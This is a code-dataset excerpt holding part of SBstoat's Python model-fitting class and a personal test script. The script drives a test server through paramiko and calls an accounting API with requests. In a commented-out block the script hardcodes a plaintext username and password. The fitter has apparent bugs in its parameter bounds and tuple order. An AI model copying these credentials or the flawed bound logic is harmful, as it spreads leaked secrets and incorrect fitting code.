\"differential_evolution\"\r\nMETHOD_BOTH = \"both\"\r\nMETHOD_LEASTSQ = \"leastsq\"\r\nMETHOD_FITTER_DEFAULTS = [METHOD_DIFFERENTIAL_EVOLUTION, METHOD_LEASTSQ]\r\nMETHOD_BOOTSTRAP_DEFAULTS = [METHOD_LEASTSQ,\r\n METHOD_DIFFERENTIAL_EVOLUTION, METHOD_LEASTSQ]\r\nMAX_CHISQ_MULT = 5\r\nPERCENTILES = [2.5, 97.55] # Percentile for confidence limits\r\nINDENTATION = \" \"\r\nNULL_STR = \"\"\r\nIS_REPORT = False\r\nLOWER_PARAMETER_MULT = 0.95\r\nUPPER_PARAMETER_MULT = 0.95\r\nLARGE_RESIDUAL = 1000000\r\n\r\n\r\n_BestParameters = collections.namedtuple(\"_BestParameters\",\r\n \"params rssq\") # parameters, residuals sum of squares\r\n\r\n\r\n\r\n##############################\r\nclass ParameterSpecification():\r\n\r\n def __init__(self, lower=None, value=None, upper=None):\r\n self.lower = lower\r\n self.value = value\r\n self.upper = upper\r\n\r\n\r\nclass ModelFitterCore(rpickle.RPickler):\r\n\r\n # Subclasses used in interface\r\n class OptimizerMethod():\r\n\r\n def __init__(self, method, kwargs):\r\n self.method = method\r\n self.kwargs = kwargs\r\n\r\n\r\n def __init__(self, modelSpecification, observedData,\r\n parametersToFit=None,\r\n selectedColumns=None,\r\n fitterMethods=None,\r\n numFitRepeat=1,\r\n bootstrapMethods=None,\r\n parameterLowerBound=PARAMETER_LOWER_BOUND,\r\n parameterUpperBound=PARAMETER_UPPER_BOUND,\r\n parameterDct=None,\r\n fittedDataTransformDct=None,\r\n logger=Logger(),\r\n isPlot=True,\r\n _loggerPrefix=\"\",\r\n # The following must be kept in sync with ModelFitterBootstrap.bootstrap\r\n numIteration:int=10,\r\n reportInterval:int=1000,\r\n maxProcess:int=None,\r\n serializePath:str=None,\r\n ):\r\n \"\"\"\r\n Constructs estimates of parameter values.\r\n\r\n Parameters\r\n ----------\r\n modelSpecification: ExtendedRoadRunner/str\r\n roadrunner model or antimony model\r\n observedData: NamedTimeseries/str\r\n str: path to CSV file\r\n parametersToFit: list-str/None\r\n parameters in the model that you want to fit\r\n if None, no parameters are fit\r\n selectedColumns: list-str\r\n species names you wish use to fit the model\r\n default: all columns in observedData\r\n parameterLowerBound: float\r\n lower bound for the fitting parameters\r\n parameterUpperBound: float\r\n upper bound for the fitting parameters\r\n parameterDct: dict\r\n key: parameter name\r\n value: triple - (lowerVange, startingValue, upperRange)\r\n fittedDataTransformDct: dict\r\n key: column in selectedColumns\r\n value: function of the data in selectedColumns;\r\n input: NamedTimeseries\r\n output: array for the values of the column\r\n logger: Logger\r\n fitterMethods: str/list-str/list-OptimizerMethod\r\n method used for minimization in fitModel\r\n numFitRepeat: int\r\n number of times fitting is repeated for a method\r\n bootstrapMethods: str/list-str/list-OptimizerMethod\r\n method used for minimization in bootstrap\r\n numIteration: number of bootstrap iterations\r\n reportInterval: number of iterations between progress reports\r\n maxProcess: Maximum number of processes to use. Default: numCPU\r\n serializePath: Where to serialize the fitter after bootstrap\r\n\r\n Usage\r\n -----\r\n parameterDct = {\r\n \"k1\": (1, 5, 10), # name of parameter: low value, initial, high\r\n \"k2\": (2, 3, 6)}\r\n ftter = ModelFitter(roadrunnerModel, \"observed.csv\",\r\n parameterDct=parameterDct)\r\n fitter.fitModel() # Do the fit\r\n fitter.bootstrap() # Estimate parameter variance with bootstrap\r\n \"\"\"\r\n if modelSpecification is not None:\r\n # Not the default constructor\r\n self._loggerPrefix = _loggerPrefix\r\n self.modelSpecification = modelSpecification\r\n self.parametersToFit = parametersToFit\r\n self.lowerBound = parameterLowerBound\r\n self.upperBound = parameterUpperBound\r\n self.bootstrapKwargs = dict(\r\n numIteration=numIteration,\r\n reportInterval=reportInterval,\r\n maxProcess=maxProcess,\r\n serializePath=serializePath,\r\n )\r\n self.parameterDct = ModelFitterCore._updateParameterDct(parameterDct)\r\n self._numFitRepeat = numFitRepeat\r\n if self.parametersToFit is None:\r\n self.parametersToFit = list(self.parameterDct.keys())\r\n self.observedTS = observedData\r\n if self.observedTS is not None:\r\n self.observedTS = mkNamedTimeseries(observedData)\r\n #\r\n self.fittedDataTransformDct = fittedDataTransformDct\r\n #\r\n if (selectedColumns is None) and (self.observedTS is not None):\r\n selectedColumns = self.observedTS.colnames\r\n self.selectedColumns = selectedColumns\r\n if self.observedTS is not None:\r\n self._observedArr = self.observedTS[self.selectedColumns].flatten()\r\n else:\r\n self._observedArr = None\r\n # Other internal state\r\n self._fitterMethods = self._makeMethods(fitterMethods,\r\n METHOD_FITTER_DEFAULTS)\r\n self._bootstrapMethods = self._makeMethods(bootstrapMethods,\r\n METHOD_BOOTSTRAP_DEFAULTS)\r\n if isinstance(self._bootstrapMethods, str):\r\n self._bootstrapMethods = [self._bootstrapMethods]\r\n self._isPlot = isPlot\r\n self._plotter = tp.TimeseriesPlotter(isPlot=self._isPlot)\r\n self._plotFittedTS = None # Timeseries that is plotted\r\n self.logger = logger\r\n # The following are calculated during fitting\r\n self.roadrunnerModel = None\r\n self.minimizer = None # lmfit.minimizer\r\n self.minimizerResult = None # Results of minimization\r\n self.params = None # params property in lmfit.minimizer\r\n self.fittedTS = self.observedTS.copy(isInitialize=True) # Initialize\r\n self.residualsTS = None # Residuals for selectedColumns\r\n self.bootstrapResult = None # Result from bootstrapping\r\n # Validation checks\r\n self._validateFittedDataTransformDct()\r\n self._bestParameters = _BestParameters(rssq=None, params=None)\r\n else:\r\n pass\r\n\r\n def _makeMethods(self, methods, default):\r\n \"\"\"\r\n Creates a method dictionary.\r\n\r\n Parameters\r\n ----------\r\n methods: str/list-str/dict\r\n method used for minimization in fitModel\r\n dict: key-method, value-optional parameters\r\n\r\n Returns\r\n -------\r\n list-OptimizerMethod\r\n key: method name\r\n value: dict of optional parameters\r\n \"\"\"\r\n if methods is None:\r\n methods = default\r\n if isinstance(methods, str):\r\n if methods == METHOD_BOTH:\r\n methods = METHOD_FITTER_DEFAULTS\r\n else:\r\n methods = [methods]\r\n if isinstance(methods, list):\r\n if isinstance(methods[0], str):\r\n results = [ModelFitterCore.OptimizerMethod(method=m, kwargs={})\r\n for m in methods]\r\n else:\r\n results = methods\r\n else:\r\n raise RuntimeError(\"Must be a list\")\r\n trues = [isinstance(m, ModelFitterCore.OptimizerMethod) for m in results]\r\n if not all(trues):\r\n raise ValueError(\"Invalid methods: %s\" % str(methods))\r\n return results\r\n\r\n\r\n @classmethod\r\n def mkParameters(cls, parameterDct:dict=None,\r\n parametersToFit:list=None,\r\n logger:Logger=Logger(),\r\n lowerBound:float=PARAMETER_LOWER_BOUND,\r\n upperBound:float=PARAMETER_UPPER_BOUND)->lmfit.Parameters:\r\n \"\"\"\r\n Constructs lmfit parameters based on specifications.\r\n\r\n Parameters\r\n ----------\r\n parameterDct: key=name, value=ParameterSpecification\r\n parametersToFit: list of parameters to fit\r\n logger: error logger\r\n lowerBound: lower value of range for parameters\r\n upperBound: upper value of range for parameters\r\n\r\n Returns\r\n -------\r\n lmfit.Parameters\r\n \"\"\"\r\n def get(value, base_value, multiplier):\r\n if value is not None:\r\n return value\r\n return base_value*multiplier\r\n #\r\n if (parametersToFit is None) and (parameterDct is None):\r\n raise RuntimeError(\"Must specify one of these parameters.\")\r\n if parameterDct is None:\r\n parameterDct = {}\r\n if parametersToFit is None:\r\n parametersToFit = parameterDct.keys()\r\n if logger is None:\r\n logger = logger()\r\n params = lmfit.Parameters()\r\n for parameterName in parametersToFit:\r\n if parameterName in parameterDct.keys():\r\n specification = parameterDct[parameterName]\r\n value = get(specification.value, specification.value, 1.0)\r\n if value > 0:\r\n lower_factor = LOWER_PARAMETER_MULT\r\n upper_factor = UPPER_PARAMETER_MULT\r\n else:\r\n upper_factor = UPPER_PARAMETER_MULT\r\n lower_factor = LOWER_PARAMETER_MULT\r\n lower = get(specification.lower, specification.value,\r\n lower_factor)\r\n upper = get(specification.upper, specification.value,\r\n upper_factor)\r\n if np.isclose(lower - upper, 0):\r\n upper = 0.0001\r\n try:\r\n params.add(parameterName, value=value, min=lower, max=upper)\r\n except Exception as err:\r\n msg = \"modelFitterCore/mkParameters parameterName %s\" \\\r\n % parameterName\r\n logger.error(msg, err)\r\n else:\r\n value = np.mean([lowerBound, upperBound])\r\n params.add(parameterName, value=value,\r\n min=lowerBound, max=upperBound)\r\n return params\r\n\r\n @classmethod\r\n def initializeRoadrunnerModel(cls, modelSpecification):\r\n \"\"\"\r\n Sets self.roadrunnerModel.\r\n\r\n Parameters\r\n ----------\r\n modelSpecification: ExtendedRoadRunner/str\r\n\r\n Returns\r\n -------\r\n ExtendedRoadRunner\r\n \"\"\"\r\n if isinstance(modelSpecification,\r\n te.roadrunner.extended_roadrunner.ExtendedRoadRunner):\r\n roadrunnerModel = modelSpecification\r\n elif isinstance(modelSpecification, str):\r\n roadrunnerModel = te.loada(modelSpecification)\r\n else:\r\n msg = 'Invalid model.'\r\n msg = msg + \"\\nA model must either be a Roadrunner model \"\r\n msg = msg + \"an Antimony model.\"\r\n raise ValueError(msg)\r\n return roadrunnerModel\r\n\r\n @classmethod\r\n def setupModel(cls, roadrunner, parameters, logger=Logger()):\r\n \"\"\"\r\n Sets up the model for use based on the parameter parameters\r\n\r\n Parameters\r\n ----------\r\n roadrunner: ExtendedRoadRunner\r\n parameters: lmfit.Parameters\r\n logger Logger\r\n \"\"\"\r\n pp = parameters.valuesdict()\r\n for parameter in pp.keys():\r\n try:\r\n roadrunner.model[parameter] = pp[parameter]\r\n except Exception as err:\r\n msg = \"_modelFitterCore.setupModel: Could not set value for %s\" \\\r\n % parameter\r\n logger.error(msg, err)\r\n\r\n @classmethod\r\n def runSimulation(cls, parameters=None,\r\n roadrunner=None,\r\n startTime=0,\r\n endTime=5,\r\n numPoint=30,\r\n selectedColumns=None,\r\n returnDataFrame=True,\r\n _logger=Logger(),\r\n _loggerPrefix=\"\",\r\n ):\r\n \"\"\"\r\n Runs a simulation. Defaults to parameter values in the simulation.\r\n\r\n Parameters\r\n ----------\r\n roadrunner: ExtendedRoadRunner/str\r\n Roadrunner model\r\n parameters: lmfit.Parameters\r\n lmfit parameters\r\n startTime: float\r\n start time for the simulation\r\n endTime: float\r\n end time for the simulation\r\n numPoint: int\r\n number of points in the simulation\r\n selectedColumns: list-str\r\n output columns in simulation\r\n returnDataFrame: bool\r\n return a DataFrame\r\n _logger: Logger\r\n _loggerPrefix: str\r\n\r\n\r\n Return\r\n ------\r\n NamedTimeseries (or None if fail to converge)\r\n \"\"\"\r\n if isinstance(roadrunner, str):\r\n roadrunner = cls.initializeRoadrunnerModel(roadrunner)\r\n else:\r\n roadrunner.reset()\r\n if parameters is not None:\r\n # Parameters have been specified\r\n cls.setupModel(roadrunner, parameters, logger=_logger)\r\n # Do the simulation\r\n if selectedColumns is not None:\r\n newSelectedColumns = list(selectedColumns)\r\n if TIME not in newSelectedColumns:\r\n newSelectedColumns.insert(0, TIME)\r\n try:\r\n data = roadrunner.simulate(startTime, endTime, numPoint,\r\n newSelectedColumns)\r\n except Exception as err:\r\n _logger.error(\"Roadrunner exception: \", err)\r\n data = None\r\n else:\r\n try:\r\n data = roadrunner.simulate(startTime, endTime, numPoint)\r\n except Exception as err:\r\n _logger.exception(\"Roadrunner exception: %s\", err)\r\n data = None\r\n if data is None:\r\n return data\r\n fittedTS = NamedTimeseries(namedArray=data)\r\n if returnDataFrame:\r\n result = fittedTS.to_dataframe()\r\n else:\r\n result = fittedTS\r\n return result\r\n\r\n @classmethod\r\n def rpConstruct(cls):\r\n \"\"\"\r\n Overrides rpickler.rpConstruct to create a method that\r\n constructs an instance without arguments.\r\n\r\n Returns\r\n -------\r\n Instance of cls\r\n \"\"\"\r\n return cls(None, None, None)\r\n\r\n def rpRevise(self):\r\n \"\"\"\r\n Overrides rpickler.\r\n \"\"\"\r\n if \"logger\" not in self.__dict__.keys():\r\n self.logger = Logger()\r\n\r\n def _validateFittedDataTransformDct(self):\r\n if self.fittedDataTransformDct is not None:\r\n keySet = set(self.fittedDataTransformDct.keys())\r\n selectedColumnsSet = self.selectedColumns\r\n if (keySet is not None) and (selectedColumnsSet is not None):\r\n excess = set(keySet).difference(selectedColumnsSet)\r\n if len(excess) > 0:\r\n msg = \"Columns not in selectedColumns: %s\" % str(excess)\r\n raise ValueError(msg)\r\n\r\n def _transformFittedTS(self, data):\r\n \"\"\"\r\n Updates the fittedTS taking into account required transformations.\r\n\r\n Parameters\r\n ----------\r\n data: np.ndarray\r\n\r\n Results\r\n ----------\r\n NamedTimeseries\r\n \"\"\"\r\n colnames = list(self.selectedColumns)\r\n colnames.insert(0, TIME)\r\n fittedTS = NamedTimeseries(array=data[:, :], colnames=colnames)\r\n if self.fittedDataTransformDct is not None:\r\n for column, func in self.fittedDataTransformDct.items():\r\n if func is not None:\r\n fittedTS[column] = func(fittedTS)\r\n return fittedTS\r\n\r\n @staticmethod\r\n def _updateParameterDct(parameterDct):\r\n \"\"\"\r\n Handles values that are tuples instead of ParameterSpecification.\r\n \"\"\"\r\n if parameterDct is None:\r\n parameterDct = {}\r\n dct = dict(parameterDct)\r\n for name, value in parameterDct.items():\r\n if isinstance(value, tuple):\r\n dct[name] = ParameterSpecification(lower=value[0],\r\n upper=value[1], value=value[2])\r\n return dct\r\n\r\n @staticmethod\r\n def addParameter(parameterDct: dict,\r\n name: str, lower: float, upper: float, value: float):\r\n \"\"\"\r\n Adds a parameter to a list of parameters.\r\n\r\n Parameters\r\n ----------\r\n parameterDct: parameter dictionary to agument\r\n name: parameter name\r\n lower: lower range of parameter value\r\n upper: upper range of parameter value\r\n value: initial value\r\n\r\n Returns\r\n -------\r\n dict\r\n \"\"\"\r\n parameterDct[name] = ParameterSpecification(\r\n lower=lower, upper=upper, value=value)\r\n\r\n def _adjustNames(self, antimonyModel:str, observedTS:NamedTimeseries) \\\r\n ->typing.Tuple[NamedTimeseries, list]:\r\n \"\"\"\r\n Antimony exports can change the names of floating species\r\n by adding a \"_\" at the end. Check for this and adjust\r\n the names in observedTS.\r\n\r\n Return\r\n ------\r\n NamedTimeseries: newObservedTS\r\n list: newSelectedColumns\r\n \"\"\"\r\n rr = te.loada(antimonyModel)\r\n dataNames = rr.simulate().colnames\r\n names = [\"[%s]\" % n for n in observedTS.colnames]\r\n missingNames = [n[1:-1] for n in set(names).difference(dataNames)]\r\n newSelectedColumns = list(self.selectedColumns)\r\n if len(missingNames) > 0:\r\n newObservedTS = observedTS.copy()\r\n self.logger.exception(\"Missing names in antimony export: %s\"\r\n % str(missingNames))\r\n for name in observedTS.colnames:\r\n missingName = \"%s_\" % name\r\n if name in missingNames:\r\n newObservedTS = newObservedTS.rename(name, missingName)\r\n newSelectedColumns.remove(name)\r\n newSelectedColumns.append(missingName)\r\n else:\r\n newObservedTS = observedTS\r\n return newObservedTS, newSelectedColumns\r\n\r\n def copy(self, isKeepLogger=False):\r\n \"\"\"\r\n Creates a copy of the model fitter.\r\n Preserves the user-specified settings and the results\r\n of bootstrapping.\r\n \"\"\"\r\n if not isinstance(self.modelSpecification, str):\r\n try:\r\n modelSpecification = self.modelSpecification.getAntimony()\r\n except Exception as err:\r\n self.logger.error(\"Problem wth conversion to Antimony. Details:\",\r\n err)\r\n raise ValueError(\"Cannot proceed.\")\r\n observedTS, selectedColumns = self._adjustNames(\r\n modelSpecification, self.observedTS)\r\n else:\r\n modelSpecification = self.modelSpecification\r\n observedTS = self.observedTS.copy()\r\n selectedColumns = self.selectedColumns\r\n #\r\n if isKeepLogger:\r\n logger = self.logger\r\n elif self.logger is not None:\r\n logger = self.logger.copy()\r\n else:\r\n logger = None\r\n newModelFitter = self.__class__(\r\n copy.deepcopy(modelSpecification),\r\n observedTS,\r\n copy.deepcopy(self.parametersToFit),\r\n selectedColumns=selectedColumns,\r\n fitterMethods=self._fitterMethods,\r\n bootstrapMethods=self._bootstrapMethods,\r\n parameterLowerBound=self.lowerBound,\r\n parameterUpperBound=self.upperBound,\r\n parameterDct=copy.deepcopy(self.parameterDct),\r\n fittedDataTransformDct=copy.deepcopy(self.fittedDataTransformDct),\r\n logger=logger,\r\n isPlot=self._isPlot)\r\n if self.bootstrapResult is not None:\r\n newModelFitter.bootstrapResult = self.bootstrapResult.copy()\r\n newModelFitter.params = newModelFitter.bootstrapResult.params\r\n else:\r\n newModelFitter.bootstrapResult = None\r\n newModelFitter.params = self.params\r\n return newModelFitter\r\n\r\n def initializeRoadRunnerModel(self):\r\n \"\"\"\r\n Sets self.roadrunnerModel.\r\n \"\"\"\r\n self.roadrunnerModel = ModelFitterCore.initializeRoadrunnerModel(\r\n self.modelSpecification)\r\n\r\n def getDefaultParameterValues(self):\r\n \"\"\"\r\n Obtain the original values of parameters.\r\n\r\n Returns\r\n -------\r\n dict:\r\n key: parameter name\r\n value: value of parameter\r\n \"\"\"\r\n dct = {}\r\n self.initializeRoadRunnerModel()\r\n self.roadrunnerModel.reset()\r\n for parameterName in self.parametersToFit:\r\n dct[parameterName] = self.roadrunnerModel.model[parameterName]\r\n return dct\r\n\r\n def simulate(self, params=None, startTime=None, endTime=None, numPoint=None):\r\n \"\"\"\r\n Runs a simulation. Defaults to parameter values in the simulation.\r\n\r\n Parameters\r\n ----------\r\n params: lmfit.Parameters\r\n startTime: float\r\n endTime: float\r\n numPoint: int\r\n\r\n Return\r\n ------\r\n NamedTimeseries\r\n \"\"\"\r\n def setValue(default, parameter):\r\n # Sets to default if parameter unspecified\r\n if parameter is None:\r\n return default\r\n return parameter\r\n #\r\n startTime = setValue(self.observedTS.start, startTime)\r\n endTime = setValue(self.observedTS.end, endTime)\r\n numPoint = setValue(len(self.observedTS), numPoint)\r\n #\r\n if self.roadrunnerModel is None:\r\n self.initializeRoadRunnerModel()\r\n #\r\n return ModelFitterCore.runSimulation(parameters=params,\r\n roadrunner=self.roadrunnerModel,\r\n startTime=startTime,\r\n endTime=endTime,\r\n numPoint=numPoint,\r\n selectedColumns=self.selectedColumns,\r\n _logger=self.logger,\r\n _loggerPrefix=self._loggerPrefix,\r\n returnDataFrame=False)\r\n\r\n def updateFittedAndResiduals(self, **kwargs)->np.ndarray:\r\n \"\"\"\r\n Updates values of self.fittedTS and self.residualsTS\r\n based on self.params.\r\n\r\n Parameters\r\n ----------\r\n kwargs: dict\r\n arguments for simulation\r\n\r\n Instance Variables Updated\r\n --------------------------\r\n self.fittedTS\r\n self.residualsTS\r\n\r\n Returns\r\n -------\r\n 1-d ndarray of residuals\r\n \"\"\"\r\n self.fittedTS = self.simulate(**kwargs) # Updates self.fittedTS\r\n residualsArr = self._residuals(self.params)\r\n numRow = len(self.fittedTS)\r\n numCol = len(residualsArr)//numRow\r\n residualsArr = np.reshape(residualsArr, (numRow, numCol))\r\n cols = self.selectedColumns\r\n if self.residualsTS is None:\r\n self.residualsTS = self.observedTS.subsetColumns(cols)\r\n self.residualsTS[cols] = residualsArr\r\n\r\n def _residuals(self, params)->np.ndarray:\r\n \"\"\"\r\n Compute the residuals between objective and experimental data\r\n Handle nan values in observedTS. This internal-only method\r\n is implemented to maximize efficieency.\r\n\r\n Parameters\r\n ----------\r\n kwargs: dict\r\n arguments for simulation\r\n\r\n Returns\r\n -------\r\n 1-d ndarray of residuals\r\n \"\"\"\r\n data = ModelFitterCore.runSimulation(parameters=params,\r\n roadrunner=self.roadrunnerModel,\r\n startTime=self.observedTS.start,\r\n endTime=self.observedTS.end,\r\n numPoint=len(self.observedTS),\r\n selectedColumns=self.selectedColumns,\r\n _logger=self.logger,\r\n _loggerPrefix=self._loggerPrefix,\r\n returnDataFrame=False)\r\n if data is None:\r\n residualsArr = np.repeat(LARGE_RESIDUAL, len(self._observedArr))\r\n else:\r\n residualsArr = self._observedArr - data.flatten()\r\n residualsArr = np.nan_to_num(residualsArr)\r\n rssq = sum(residualsArr**2)\r\n if (self._bestParameters.rssq is None) \\\r\n or (rssq < self._bestParameters.rssq):\r\n self._bestParameters = _BestParameters(\r\n params=params.copy(), rssq=rssq)\r\n return residualsArr\r\n\r\n def fitModel(self, params:lmfit.Parameters=None, max_nfev=100):\r\n \"\"\"\r\n Fits the model by adjusting values of parameters based on\r\n differences between simulated and provided values of\r\n floating species.\r\n\r\n Parameters\r\n ----------\r\n params: starting values of parameters\r\n\r\n Example\r\n -------\r\n f.fitModel()\r\n \"\"\"\r\n ParameterDescriptor = collections.namedtuple(\"ParameterDescriptor\",\r\n \"params method rssq kwargs minimizer minimizerResult\")\r\n MAX_NFEV = \"max_nfev\"\r\n block = Logger.join(self._loggerPrefix, \"fitModel\")\r\n guid = self.logger.startBlock(block)\r\n self.initializeRoadRunnerModel()\r\n self.params = None\r\n if self.parametersToFit is not None:\r\n if params is None:\r\n params = self.mkParams()\r\n # Fit the model to the data using one or more methods.\r\n # Choose the result with the lowest residual standard deviation\r\n paramResults = []\r\n lastExcp = None\r\n for idx, optimizerMethod in enumerate(self._fitterMethods):\r\n method = optimizerMethod.method\r\n kwargs = optimizerMethod.kwargs\r\n if MAX_NFEV not in kwargs:\r\n kwargs[MAX_NFEV] = max_nfev\r\n for _ in range(self._numFitRepeat):\r\n self._bestParameters = _BestParameters(params=None, rssq=None)\r\n minimizer = lmfit.Minimizer(self._residuals, params)\r\n try:\r\n minimizerResult = minimizer.minimize(\r\n method=method, **kwargs)\r\n except Exception as excp:\r\n lastExcp = excp\r\n msg = \"Error minimizing for method: %s\" % method\r\n self.logger.error(msg, excp)\r\n continue\r\n params = self._bestParameters.params.copy()\r\n rssq = np.sum(self._residuals(params)**2)\r\n if len(paramResults) > idx:\r\n if rssq >= paramResults[idx].rssq:\r\n continue\r\n parameterDescriptor = ParameterDescriptor(\r\n params=params,\r\n method=method,\r\n rssq=rssq,\r\n kwargs=dict(kwargs),\r\n minimizer=minimizer,\r\n minimizerResult=minimizerResult,\r\n )\r\n paramResults.append(parameterDescriptor)\r\n if len(paramResults) == 0:\r\n msg = \"*** Minimizer failed for this model and data.\"\r\n self.logger.error(msg, lastExcp)\r\n else:\r\n # Select the result that has the smallest residuals\r\n sortedMethods = sorted(paramResults, key=lambda r: r.rssq)\r\n bestMethod = sortedMethods[0]\r\n self.params = bestMethod.params\r\n self.minimizer= bestMethod.minimizer\r\n self.minimizerResult = bestMethod.minimizerResult\r\n # Ensure that residualsTS and fittedTS match the parameters\r\n self.updateFittedAndResiduals(params=self.params)\r\n self.logger.endBlock(guid)\r\n\r\n def getFittedModel(self):\r\n \"\"\"\r\n Provides the roadrunner model with fitted parameters\r\n\r\n Returns\r\n -------\r\n ExtendedRoadrunner\r\n \"\"\"\r\n self._checkFit()\r\n self.roadrunnerModel.reset()\r\n self._setupModel(self.params)\r\n return self.roadrunnerModel\r\n\r\n def _setupModel(self, parameters):\r\n \"\"\"\r\n Sets up the model for use based on the parameter parameters\r\n\r\n Parameters\r\n ----------\r\n parameters: lmfit.Parameters\r\n\r\n \"\"\"\r\n ModelFitterCore.setupModel(self.roadrunnerModel, parameters, logger=self.logger)\r\n\r\n def mkParams(self, parameterDct:dict=None)->lmfit.Parameters:\r\n \"\"\"\r\n Constructs lmfit parameters based on specifications.\r\n\r\n Parameters\r\n ----------\r\n parameterDct: key=name, value=ParameterSpecification\r\n\r\n Returns\r\n -------\r\n lmfit.Parameters\r\n \"\"\"\r\n if parameterDct is None:\r\n parameterDct = self.parameterDct\r\n return ModelFitterCore.mkParameters(parameterDct,\r\n parametersToFit=self.parametersToFit,\r\n logger=self.logger,\r\n lowerBound=self.lowerBound,\r\n upperBound=self.upperBound)\r\n\r\n def _checkFit(self):\r\n if self.params is None:\r\n raise ValueError(\"Must use fitModel before using this method.\")\r\n\r\n def serialize(self, path):\r\n \"\"\"\r\n Serialize the model to a path.\r\n\r\n Parameters\r\n ----------\r\n path: str\r\n File path\r\n \"\"\"\r\n newModelFitter = self.copy()\r\n with open(path, \"wb\") as fd:\r\n rpickle.dump(newModelFitter, fd)\r\n\r\n @classmethod\r\n def deserialize(cls, path):\r\n \"\"\"\r\n Deserialize the model from a path.\r\n\r\n Parameters\r\n ----------\r\n path: str\r\n File path\r\n\r\n Return\r\n ------\r\n ModelFitter\r\n Model is initialized.\r\n \"\"\"\r\n with open(path, \"rb\") as fd:\r\n fitter = rpickle.load(fd)\r\n fitter.initializeRoadRunnerModel()\r\n return fitter\r\n","sub_path":"SBstoat/_modelFitterCore.py","file_name":"_modelFitterCore.py","file_ext":"py","file_size_in_byte":30864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"247373980","text":"import configparser\nimport re\nfrom base.adminka import create_user_session, wait_periodictask_to_be_done2\nimport paramiko\nimport time\nimport datetime\n\nconfig = configparser.ConfigParser()\nconfig.read(\"cred/config.ini\")\n#\n# host = config['server']['host']\n# port = int(config['server']['port'])\n# user = config['server']['username']\n# password = config['server']['password']\n# \"\"\"----------------------upload excel file---------------------------\"\"\"\n# transport = paramiko.Transport((host, port))\n# transport.connect(username=user, password=password)\n# sftp = paramiko.SFTPClient.from_transport(transport)\n#\n#\n# remotepath = f'/home/alex_zatushevkiy/month_import/accounts.xlsx'\n# localpath = f'C:/Users/wsu/Desktop/accounts.xlsx'\n# sftp.put(localpath, remotepath)\n#\n# sftp.close()\n# transport.close()\n# time.sleep(10)\n#\n# \"\"\"---------------------run script on server-------------------\"\"\"\n# client = paramiko.SSHClient()\n# client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n# client.connect(hostname=host, username=user, password=password, port=port)\n#\n# stdin, stdout, stderr = client.exec_command('cd /smartteam/msw_server_9999/msw && '\n# 'python3 manage.py shell < /home/alex_zatushevkiy/10/cleaner_super.py && '\n# 'python3 manage.py shell < /home/alex_zatushevkiy/month_import/poo.py')\n# client.close()\n# time.sleep(15)\n\"\"\"------------------------------run month import---------------------------------\"\"\"\n# session = create_user_session(config['host']['host_9999'], **config['super_user_9999'])\n#\n# for i in range(1):\n# url = f'https://mytest-server.sg.com.ua:9999/api/accounting_system/full_prop_data/' \\\n# f'?date_from=2021-06-25&file_format=xlsx'\n#\n# a = time.time()\n# get = session.get(url)\n# print(get.status_code)\n# print(time.time() - a)\n# # print(get.text)\n# # print(len(get.json()))\n# with open(f'./as45_report.xlsx', 'wb') as file:\n# file.write(get.content)\n# print(time.time() - a)\n\n# csrfmiddlewaretoken = re.findall('name=\"csrfmiddlewaretoken\" value=\"(.+)\">', get.text)[0]\n#\n# recon_dict = {\n# 'csrfmiddlewaretoken' : csrfmiddlewaretoken,\n# 'action': 'run_tasks',\n# 'select_across': '0',\n# 'index': '0',\n# '_selected_action': '86',\n# }\n# print(datetime.datetime.now())\n# session.post(url, data=recon_dict, headers={\"Referer\": url})\n# print(datetime.datetime.now())\n# asd = config[\"pg_db_9999\"]\n#\n# print(wait_periodictask_to_be_done2('import_from_propreports_monthly', asd))\n# print(datetime.datetime.now())\n#\n# print(wait_periodictask_to_be_done2('entries_for_prop_month_correction', asd))\n# print(datetime.datetime.now())\n\n\n\nfrom base.main_functions import get_token\nsession = create_user_session(config['host']['host_9999'], **config['super_user_9999'])\nprint(session.cookies)\n# response = session.get('https://mytest-server.sg.com.ua:9999/api/accounting_system/account_type/')\n# print(response.text)\n\nwhile True:\n print('question')\n asd = input()\n if asd == 'exit':\n break\n elif asd == 'yes':\n response = session.get('https://mytest-server.sg.com.ua:9999/api/accounting_system/account_type/', headers={'Refresh-Session': ''})\n print(response.status_code)\n print(response.cookies)\n else:\n response = session.get('https://mytest-server.sg.com.ua:9999/api/accounting_system/account_type/')\n print(response.status_code)\n print(response.cookies)\n# for i in range(3):\n# url = 'https://mytest-server.sg.com.ua:9999/api/accounting_system/entry/'\n# request = {\n# 'transaction_out.user_bill': '142015',\n# 'transaction_out.company_bill': '',\n# 'transaction_in.user_bill': '',\n# 'transaction_in.company_bill': '120',\n# 'entry.date_to_execute': '2021-08-10T00:00:00',\n# 'entry.description': 'autotest',\n# 'transaction_common.amount_usd': '9',\n# 'transaction_common.description': 'autotest',\n# 'csrfmiddlewaretoken': get_token(session, url),\n# }\n# response = session.post(url, data=request, headers={\"Referer\": url})\n# print(response.text)\n# entry = response.json()['entry']\n# time.sleep(0.1)\n# url = f'https://mytest-server.sg.com.ua:9999/api/accounting_system/entry/cancel/{entry}/'\n# response = session.get(url)\n# print(response.text)\n\n# import requests\n#\n#\n# url = 'https://mytest-server.sg.com.ua:9999/api/token/'\n# session = requests.Session()\n#\n# request_dict = {\n# 'username': 'Admin_Zatush',\n# 'password': '1423qrwe',\n# }\n# response = session.post(url, data=request_dict)\n# tokens = response.json()\n# access = tokens['access']\n# print('access token: ', access)\n#\n#\n#\n# url = 'https://mytest-server.sg.com.ua:9999/api/accounting_system/app/full_prop_data/'\n#\n# token2 = get_token(session, url, key ='X-CSRFToken')\n#\n# url = 'https://mytest-server.sg.com.ua:9999/api/accounting_system/app/full_prop_data/'\n# resp = session.get(url, headers={\"Authorization\": f'Token {access}'})\n# # print(resp.request.headers)\n# print(resp.status_code)\n# print(resp.text)\n\n# url = \"https://test.pinesoftware.com.cy:9443/contacts/\"\n# session = requests.Session()\n# token = get_token(session, url)\n# body = {\n# 'csrfmiddlewaretoken': token,\n# 'first_name': 'asdasdsdg',\n# 'last_name': 'fjfgj',\n# 'email': 'asd@gmail.com',\n# 'telephone': '+56784938456',\n# 'text': 'asdgasdgasdg',\n# 'contacts': '',\n# 'file': '',\n# }\n# response = session.post(url, data=body, headers={\"Referer\": url})\n#\n# print(response.text)\n# 